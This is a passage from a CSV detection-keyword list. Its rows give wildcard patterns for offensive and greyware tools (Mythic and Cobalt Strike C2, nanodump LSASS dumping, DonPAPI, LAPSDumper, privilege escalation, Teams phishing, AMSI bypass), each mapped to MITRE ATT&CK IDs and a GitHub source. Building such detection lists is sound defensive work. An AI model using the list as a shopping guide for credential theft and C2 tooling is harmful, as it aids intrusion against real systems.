- TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*multi_vendor_cctv_dvr_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*multibit2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*MultiPotato.cpp*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*MultiPotato.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*MultiPotato-main*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*--mutator N*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*mutator.py *","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*mvelazc0/BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*mwrlabs*","offensive_tool_keyword","Github Username","used to be a malware repo aso hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mwrlabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*-my.sharepoint.com/personal/Fakeuser*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*-my.sharepoint.com/personal/TESTUSER_*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" +"*my_dump_my_pe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*myreallycooltotallyrealtenant.onmicrosoft.com*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*myseatbelt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*mysql -u* -p c2 < c2_sample.sql*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*mysql_authbypass_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mysql_file_enum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mysql_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mysql-privesc-race.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*Mystikal-main*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*mythic_c2_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_nginx*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_rest.Payload*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_service.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_translator_containter*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*MythicAgents/Apollo*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*MythicAgents/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*MythicAgents/merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*MythicAgents/tetanus*","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","1","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" +"*mythic-cli *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic-cli*athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*MythicClient.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*mythic-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*MzHmO/DebugAmsi*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*MzHmO/Privileger*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*MzHmO/TGSThief*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*n00py/LAPSDumper*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"*n00py/Slackor*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*n0de.exe*elevationstation*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*n1k7l4i/goMatrixC2*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*n1k7l4i/goZulipC2*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*n1nj4sec*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/n1nj4sec","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nabbmpekekjknlbkgpodfndbodhijjem*","greyware_tool_keyword","Earth VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nac_bypass*","offensive_tool_keyword","nac_bypass","nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters","T1550.002 - T1078 - T1133 - T1040 - T1550","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Defense Evasion","https://github.com/scipag/nac_bypass","1","1","N/A","N/A","3","229","62","2023-08-02T09:09:19Z","2019-01-03T06:55:00Z" +"*nagios-root-privesc.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*--name chisel -p *","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*name=*Domain Admins*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*named_pipes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NamedPipeImpersonation.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*NamedPipeImpersonation.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*NamedPipeServer.ps1*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*namespace CredPhisher*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*namespace RedPersist.Persist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*namespace WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*namfblliamklmeodpcelkokjbffgmeoo*","greyware_tool_keyword","Daily VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*namp *--script *","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nanodump *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump -*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*nanodump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.git*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.x64.exe*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*nanodump_pipe*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, 